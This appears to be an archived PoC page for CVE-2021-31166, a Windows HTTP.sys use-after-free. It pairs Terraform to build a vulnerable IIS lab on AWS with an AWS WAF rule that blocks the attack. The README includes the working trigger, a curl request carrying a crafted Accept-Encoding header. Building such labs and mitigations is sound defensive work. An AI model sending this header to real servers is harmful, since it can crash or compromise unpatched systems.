CVE-2021-31166 PoC — Microsoft HTTP.sys 资源管理错误漏洞

Source

https://github.com/bgsilvait/WIn-CVE-2021-31166

Associated Vulnerability

Title:Microsoft HTTP.sys 资源管理错误漏洞 (CVE-2021-31166)
Description:Microsoft HTTP.sys是美国微软（Microsoft）公司的一个应用协议。HTTP应用协议。 HTTP.sys存在资源管理错误漏洞。以下产品和版本受到影响：Windows 10 Version 2004 for 32-bit Systems,Windows 10 Version 2004 for ARM64-based Systems,Windows 10 Version 2004 for x64-based Systems,Windows Server, version 2004 (Ser

Readme

# WIn-CVE-2021-31166

**This Repo** is inspired on [0vercl0k](https://github.com/0vercl0k/CVE-2021-31166#cve-2021-31166-http-protocol-stack-remote-code-execution-vulnerability) for  a proof of concept for [CVE-2021-31166](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31166) ("HTTP Protocol Stack Remote Code Execution Vulnerability"), a use-after-free dereference in `http.sys` patched by Microsoft in May 2021.



## Build Infraestructure

```bash
git clone https://github.com/bgsilvait/WIn-CVE-2021-31166.git
cd WIn-CVE-2021-31166
terraform init
terraform plan
terraform apply --auto-approve
```

The terraform will create an EC2 Instance with [Windows Server Core 20H2](https://docs.microsoft.com/en-us/windows-server/get-started/whats-new-in-windows-server-2004), install `IIS` and add `SSM` permissions to open a `Web Powershell Session from AWS Console`. It will also create a `Application Load Balancer` and use the instance as target. By default the `Security Group` will add only **YOUR IP** as allow to access on **HTTP**.

## Get values

```bash
#Define Values from Terraform Output
ALB=$(terraform output -raw lb_dns_name)
EC2IP=$(terraform output -json public_ip | jq -r '.[0]')
```

## Testing Connectivity
```bash
#Testing to ALB
while true; do curl -I $ALB --connect-timeout 1 ; done

#Testing Directly to EC2'
while true; do curl -I $EC2IP --connect-timeout 1 ; done
```

## Inject CVE Header 
```bash
#Testing to ALB
curl -i $ALB -H "Accept-Encoding: doar-e, ftw, imo, ,"

#Testing Directly to EC2'
curl -i $EC2IP -H "Accept-Encoding: doar-e, ftw, imo, ,"
```

##  Rule for AWS WAFv2 to Block
```json
{
  "Name": "cve-block",
  "Priority": 0,
  "Statement": {
    "ByteMatchStatement": {
      "SearchString": "doar-e, ftw, imo, ,",
      "FieldToMatch": {
        "SingleHeader": {
          "Name": "accept-encoding"
        }
      },
      "TextTransformations": [
        {
          "Priority": 0,
          "Type": "NONE"
        }
      ],
      "PositionalConstraint": "EXACTLY"
    }
  },
  "Action": {
    "Block": {
      "CustomResponse": {
        "ResponseCode": 418,
        "CustomResponseBodyKey": "418"
      }
    }
  },
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "cve-block"
  }
}
```

File Snapshot


 [4.0K]  /data/pocs/dfeeef86377848d8f05c9f4f98fce3ac917f4d2a
├── [4.5K]  main.tf
├── [ 489]  outputs.tf
└── [2.3K]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!